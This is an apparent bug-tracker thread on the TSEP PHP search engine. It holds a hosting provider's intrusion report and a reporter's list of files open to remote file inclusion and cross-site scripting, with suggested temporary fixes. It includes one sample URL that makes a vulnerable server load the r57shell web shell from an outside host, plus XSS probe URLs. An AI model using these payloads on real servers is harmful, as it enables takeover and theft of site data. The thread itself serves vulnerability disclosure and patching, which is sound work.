Wir registrierten vor kurzem einen Hackversuch auf unseren Servern, der
von Ihrer Präsenz ausging. Der Angreifer versuchte, sich durch
Sicherheitslücken in den von Ihnen verwendeten Scripten Zugriff zum
Server zu verschaffen. Es ist davon auszugehen, dass der Angreifer
Zugriff auf Ihre Daten erhalten konnte.
Es handelt sich um das Script `/search/include/copyright.php', welches
über den Parameter `tsep_config[absPath]' die Ausführung beliebigen
Codes erlaubt.
Translation (may not so good):
We registrated a hacking-raid on our server, that came from your presence. The aggressor tried to get connected to our server by using security holes in your scripts. ...
It´s a matter of the script '/search/include/copyright.php', which allows execution of any codes by the parameter 'tsep_config[absPath]'.
How can I close that Security Hole?
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
Those scripts are vulnerable to Remote File Include, most likely there are more files vulnerable, but i didnt feel like searching more, temporal fix, register_globals == off, or use .htdocs to block the access to ./tsep/include dir
The following scripts are vulnerable to XSS, it might not be as dangerous as RFI, but who cares, they need to be fixed.
Here the e-mail I got from my provider:
Wir registrierten vor kurzem einen Hackversuch auf unseren Servern, der
von Ihrer Präsenz ausging. Der Angreifer versuchte, sich durch
Sicherheitslücken in den von Ihnen verwendeten Scripten Zugriff zum
Server zu verschaffen. Es ist davon auszugehen, dass der Angreifer
Zugriff auf Ihre Daten erhalten konnte.
Es handelt sich um das Script `/search/include/copyright.php', welches
über den Parameter `tsep_config[absPath]' die Ausführung beliebigen
Codes erlaubt.
Translation (may not so good):
We registrated a hacking-raid on our server, that came from your presence. The aggressor tried to get connected to our server by using security holes in your scripts. ...
It´s a matter of the script '/search/include/copyright.php', which allows execution of any codes by the parameter 'tsep_config[absPath]'.
How can I close that Security Hole?
PS:
I deleted this file, and the code
request ( ..... /copyright.php ) // Use as many ...
(I think it was in line 741 of search.php),
and the search-engine is still working.
Do you have any other of these security holes in your scriptcodes?
Hallo there, the following scripts are vulnerable to Remote file include
./tsep.0942/include/colorswitch.php?tsep_config[absPath]=http://rst.void.ru/download/r57shell.txt?
./tsep.0942/include/printpagedetails.php ==> require_once( $tsep_config["absPath"]."/include/convert_htmlent.php" );
./tsep.0942/include/ipfunctions.php ==> require_once( $tsep_config["absPath"]."/include/IPv6.php" );
./tsep.0942/include/contentimages.class.php ==> require_once( $tsep_config["absPath"]."/include/contentimages.class.php" );
./tsep.0942/include/configfunctions.php ==> require_once( $tsep_config["absPath"]."/include/mmexfunctions.php" );
./tsep.0942/include/log.class.php ==> require_once( $tsep_config["absPath"]."/include/tseptrace.php" );
Those scripts are vulnerable to Remote File Include, most likely there are more files vulnerable, but i didnt feel like searching more, temporal fix, register_globals == off, or use .htdocs to block the access to ./tsep/include dir
The following scripts are vulnerable to XSS, it might not be as dangerous as RFI, but who cares, they need to be fixed.
./tsep.0942/include/timeneeded.php?tsep_lng[search_took]=%3Ch1%3Eelite
./tsep.0942/include/uploadfile.php?type=%3Ch1%3EXSS
./tsep.0942/include/dbconnection.php?db_server=%3Ch1%3EXSS
- beford <xbefordx gmail com>
... and when i say .htdocs i mean .htaccess :]
-- beford <xbefordx gmail com>
HI
we advise this anyways - but of course we will take care of it in the next version.
http://www.tsep.info/tsep-latest/docs/install.php#security
Olaf
Do you know when the next version is planned?